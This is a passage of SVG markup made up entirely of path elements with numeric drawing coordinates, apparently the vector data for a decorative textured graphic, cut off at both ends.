d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path 